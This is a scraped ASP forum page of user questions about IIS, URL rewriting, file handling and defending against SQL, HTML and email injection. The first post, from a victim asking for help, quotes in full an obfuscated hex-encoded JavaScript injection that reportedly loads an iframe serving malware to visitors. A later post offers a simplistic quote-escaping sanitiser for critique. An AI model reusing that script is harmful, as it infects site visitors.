New Type Of Injection? Rewrite Default Document?
This is weird, I'm pretty familiar with SQL Injection - but we're getting these weird injection that is writing in the default document or home page. What it's doing is putting in script code at the top or bottom of the home page... it looks something like this:
<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}funct ion
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCo de;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c 9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36( q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9 b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='3C7363726970743E696628216D79696129 7B646F63756D656E742E777269746528756E65736361706528 20272533632536392536362537322536312536642536352532 30253733253732253633253364253237253638253734253734 25373025336125326625326625373425373225373525363525 37322536392536652536372537342536662536652536352537 33253265253665253635253734253266253733253635253631 25373225363325363825326525363325363725363925336625 36322536312536312536372536392537322536632625323725 32622534642536312537342536382532652537322536662537 35253665253634253238253464253631253734253638253265 25373225363125366525363425366625366425323825323925 32612533352533352533352533362533372532392532622532 37253634253335253332253338253237253230253737253639 25363425373425363825336425333125333825333125323025 36382536352536392536372536382537342533642533332533 30253337253230253733253734253739253663253635253364 25323725363425363925373325373025366325363125373925 33612532302536652536662536652536352532372533652533 63253266253639253636253732253631253664253635253365 2729293B7D766172206D7969613D747275653B3C2F73637269
70743E';document.write(q4877d47d93974(q4877d47d974 0a));</script>
What it's doing is decoding itself into an iframe that links out to popups that will try and download a virus on your machine. I don't get the popup in my machine because i think i have a newer version of IE. But some people have complained that it is installing a virus on their machine.
Also what is crazy is when I replace the file with a good version. In about 30 mins, it automatically overwritten with the infected version. Also I've noticed it on some other websites that I haven't touched.
Has anyone encountered this before? Because I'm stumped as to the cause of it. I don't see the issue on our dev server. It seems to be IIS on a shared host.
View Replies
ADVERTISEMENT
I have an asp page that produces output from a database. This allows a
simple way for the user to save the data to a text file by going to
File->Save as...
The default save as options always defaults to a particular filename and the
save as type is always html, therefore the user has to manually type a
filename and choose Text File (*.txt) as the type.
I remember I was able to overide ride these options with the following code.
Response.ContentType = "text/plain"
Response.AddHeader "Content-Disposition", "inline; filename=myfilename"
This doesn't seem to be working for me anymore.
Any thoughts?
View Replies
View Related
I'm using a binary stream to send down a file with ASP from the web
server. I've been having trouble with IE and getting it to recognize
my file. I've added the filename as a paramater(?filename=file.jpgw)
to handle IE's mime type mangling, but I'm still having trouble with
IE's default Save As Type being HTML.
When we send down a jpgw
(geo-jpeg) file IE wants to save it as an HTML file. I've got the
correct filename showing in the Filename box, and if I choose the All
Files option from the Save As Type drop down then the file is saved
with the correct extension. I'd like to have the All Files option
choosen by default. I know it's just a couple of clicks but we have
some noivce users that can't seem to get that.
View Replies
View Related
I'm building a system where a presenter uploads a PPT to my server and
then I show it to all the participants. The problem is that most of the
media in the PPT is usually linked, so I'll need to upload all that
too.
Assuming I can parse the PPT and figure the exact name and
location of each of the media files I need from his hard-disk, is there
any way I can upload all these files automatically, without having to
make the user choose each of these files manually? If that's not
possible, can I atleast show the user a page with a list of input boxes
of type file, pre-populated with the file-path and name of the media
files I need, so that the user can just click 'Submit' without having
to browse and select each of them?
Please say yes. It would be a major usability crisis if my users had to
keep hitting the browse button so many times for each PPT! Especially
when I know exactly what files I need and where they are! I know that
this has a lot to do with browser security, but there's got to be SOME
way out?
View Replies
View Related
I have some ASP pages on my intranet site providing a helpdesk to my users. As part of logging a helpdesk call I am prompting them to link to a file using input type="file".
The file is on a network drive and the problem is when you click on the browse button it defaults to the clients desktop as the starting point of the browsing process. I would like to set a default location to start browsing eg etwork_serverhelpdesk to avoid confusion. Does anyone know of a way to do this ?
View Replies
View Related
how to show the URL without .asp or query string with parameters behind?
for example, i have a url string : www.abc.com/abc/abc.asp?id=1. how can i display the url in tis format with out the querystring? example: www.abc.com/abc/1
View Replies
View Related
Some of my ASP pages are dynamically generated which we all know is a bad practice in terms of SEO. I've been trying to find a way on how i can convert these dynamic pages to static pages. I found some articles about ISAPI rewrite but according to them, it only works on dedicated servers, am still not sure about this though. By the way, is it possible just to code these and generate a static ASP page from a dynamic page? Do you have some sample codes on how to do this?
View Replies
View Related
how best to get an entire .asp dynamic site geared to Search Engines - I have looked at possible URL rewrites but that may not work as the site isn't on a dedicated server?
View Replies
View Related
Basically Ive got an url:
http://www.thepagename.com/town_pag...n_name=WHATEVER
Basically need that to be written and shown in the browser like:
www.thepagename.com/WHATEVER.html
notice how i've added the .html, thats for our Search Engine
Optimisation, or it may not be needed?
View Replies
View Related
If I want to rewrite URLs like:
http://www.mysite.com/check.asp?id=213&cat=USA
how can I rewrite this URL to make it friendly?
View Replies
View Related
Been searching for a program to do an ASP re-write to help wiht the dynamic URLs. most want something to install. I noticed that .NET has something - can that possibly be used or is there something else out there that actually does not have to be installed on the server?
View Replies
View Related
I have a site hosted at Verio that has four different domain names pointing to it. So when you browse to any of the four domain names, the same site is displayed. What I would like to do is make it so www.domain1.com is the primary URL, and if anyone browses to the site using any of the other addresses, the address is changed to reflect
www.domain1.com.
Furthermore, I'd like it so if someone navigates to www.domain2.com/somepage.asp, the address is changed and the path is retained, so the browser's address bar changes to www.domain1.com/somepage.asp.
Is this possible to do when I don't have much access to the server (i.e. Verio-hosted space)? What code can I use to do this?
View Replies
View Related
In apache I used a feature called a "Rewrite rule" inside a .htaccess
file to process the URL :
i.e. http://www/mypage.html =http://www/page.php?page=mypage
Now I'd like to do a similar action on a IIS server with ASP (not
..net)...
Can anyone tell me how you can do this ?
View Replies
View Related
how to show the URL without .asp or query string with parameters behind?
for example, i have a url string : www.abc.com/abc/abc.asp?id=1. how can i display the url in tis format with out the querystring? example: www.abc.com/abc/1
View Replies
View Related
where i can find some asp hosting which comes with the isapi rewrite componant, with out me having to buy a dedicated server?
View Replies
View Related
Im looking for help in setting up an url rewrite using ISAPI Rewrite. The componet is installed on my server which is win2003. What Im looking to set up an asp page or whatever to rewrite url: domain/MyAd/66 so it will point to domain/homeDetail.asp?AD_ID=66 . I also want to be sure that I dont screw up my search engine visablity with this. Looking for some help, examples, etc.
View Replies
View Related
I have a dedicated server running on IIS 6.(hosting company) Where should I place the rules for rewriting urls?ex>
RewriteEngine On
RewriteRule /agents/(.*)/.* /realestateagent.asp?id=$1
View Replies
View Related
I have some code I need modified and I can't seem to figure it out. Here's the section of code I need to change: ....
View Replies
View Related
I have some asp code in variable so i want to rewrite anchor tags like this:
If i have:
<a href="http://www.sitepoint.com">www.sitepoint.com</a>
To be rewrited as:
<a href="http://www.sitepoint.com" target="_blank">www.sitepoint.com</a> out
The problem is that urls from my domain shouldn't be changed for example if href="/some_path" or href="http://www.mysite.com/some_path"
I try making some expressions with RegexBuddy but it didnt worked very nice.
View Replies
View Related
I got a problem while running an application. The code for this is as follows:
aList = Split(strMsg,";")
For nX = 0 to UBound(aList)
strarry=split(aList(nX),"_")
var_year=left(strarry(2),4)
var_month=mid(strarry(2),5,2)
var_day=mid(strarry(2),7,2)
var_date=var_day&"-"&var_month&"-"&var_year
var_time1=mid(strarry(2),9,2)
var_time2=mid(strarry(2),11,2)
var_time=var_time1&":"&var_time2
set rs1=conn.execute("insert into tbl_BackupfileInfo(Filename,Createddate,Createdtim e)values('" &aList(nX)&"','"&var_date&"','"&var_time&"')")
Next
while runnig this application some times it works fine .But some times it giving an error
Error Type:Microsoft VBScript runtime (0x800A000D) Type mismatch: 'UBound'.
View Replies
View Related
I recently built a login page and a friend of mine was working on something similar and said that I need to protect the login from SQL injection. I am not really sure what exactly that is. I think I have a rough idea but can someone explain it to me?
In addition, I will need to obviously protect what I built and am not sure how to go about doing that either.
View Replies
View Related
if anybody has a list of dodgy characters that can be used for sql injection attacks so that i can figure out a way to strip them from user inputs?
Also if somebody was filling in a form, that inserts into a "memo" field in access could this be used to launch such an attack or would whatever they type simply be inserted into the field? i hope that bit is clear.
i have a form field "message" which is a multi line text box, if someone typed into that box
DELETE * FROM Messages WHERE MessageID =1205
or some other command would that simply be inserted in to the database or would the server try and execute the command??
View Replies
View Related
I have heard a lot about SQL Injection. I was wondering how does an injector come to know about the table/column name when they cannot see the asp codes in a website?
View Replies
View Related
how do i test for SQL injection ?
sdo i do a SELECT statement in my username login?
View Replies
View Related
I just wanted to share it with you guys and ask your opinions. Code:
View Replies
View Related
Is it possible to "intercept" all calls to conn.execute and have them go to
a checking routine that will either let the command go through or terminate
it if it contains some illegal instructions? My clients company has had its
hacker free status revoked due to the possibility of sql injection. I could
put a function before every single conn.execute but we have hundreds of
them. Just wondering if there is some way of telling it to do something else
first. Maybe I can redefine conn.execute somehow?
View Replies
View Related
I have written several site functions to hopefully prevent against cross-site hacking, sql injection, and url encoding. I also have a symetric key encryption that is pretty basic (which isn't posted here and is total overkill). I was wondering if these functions are protecting well enough, or am I missing some tests?
Function InjFix(val)
InjFix=SEncode(Trim(Replace(val,"'","''")))
end Function
Function SEncode(val)
SEncode=Server.HtmlEncode(val)
end Function
Function URLEncode(val)
URLEncode=Server.URLEncode(val)
end Function
View Replies
View Related
I am using the method below to make sure that the query isNumeric and not longer than 4. It's a little snippet I found in another post... It works fine but I'm questioning whether it's enough.
URls like this, itemdetail.asp?-=#&ItemID=906, don't throw any errors because the "ItemID=906" is fine. Does the method used below really protect against SQL Injections in this case?
Code: ....
View Replies
View Related
I have heard a lot about SQL Injection. I was wondering how does an injector come to know about the table/column name when they cannot see the asp codes in a website?
View Replies
View Related
I have feedback forms on several of my sites and recently, they have been plagued with email injection attacks.
The forms are pretty straight-forward. Half a dozen fields get submitted to a formhandler.asp page where the contents are sent to some hard-coded email addresses using ASPmail.
From what I understand about how this works, spambots are used to add carriage returns after some of the form fields and then adding BCCs in to use the form to send out spam to other addresses. Here's an example of the emails I'm getting: .....
View Replies
View Related
Anyone got some good methods for preventing html-injection in ASP?
View Replies
View Related
I have allways validated user input to pieces prior to integrating it into a SQL statement, in order to avoid SQL Injection attacs. A colleague of mine told me that binding my vars would make them SQL scalar, but I have been left in the dark as to HOW... The web left me none the wiser, as well, so here goes: Anyone got a brief example of binding vars in ASP to get me started?
View Replies
View Related
I believe someone is using my contact form and sending out spam. I'm getting thousands of undeliverable emails.
I don't know anything about asp. Someone who use to work here wrote the form processing script and it seems that all the forms on different domains are being processed by this script. It seems like they didn't do any sort of validation or checks and on one website there are hundreds of pages with the contact form, i could do it in php but that is way too much work.....
View Replies
View Related